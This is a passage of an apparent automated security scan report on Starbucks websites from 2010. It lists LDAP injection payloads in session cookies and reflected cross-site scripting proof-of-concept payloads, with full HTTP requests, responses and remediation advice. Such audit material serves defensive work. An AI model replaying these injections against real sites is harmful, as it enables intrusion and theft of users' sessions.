   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(do
...[SNIP]...

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be incorporated unsafely into a disjunctive LDAP query.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.

The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be incorporated unsafely into a disjunctive LDAP query.

Request 1

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="java
...[SNIP]...

Request 2

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)!(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#'
...[SNIP]...

3. Cross-site scripting (reflected)
There are 76 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" />
...[SNIP]...

3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=ntjkwoi4dh2ibi45qfgoseio; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:15:04 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" />
...[SNIP]...

3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:25 GMT
Content-Length: 56826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/>
...[SNIP]...

3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:00:23 GMT
Connection: close
Content-Length: 37678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/>
...[SNIP]...

3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:15 GMT
Connection: close
Content-Length: 39114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/>
...[SNIP]...

3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:03:56 GMT
Connection: close
Content-Length: 43928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/>
...[SNIP]...

3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:39 GMT
Connection: close
Content-Length: 52482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/>
...[SNIP]...

3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

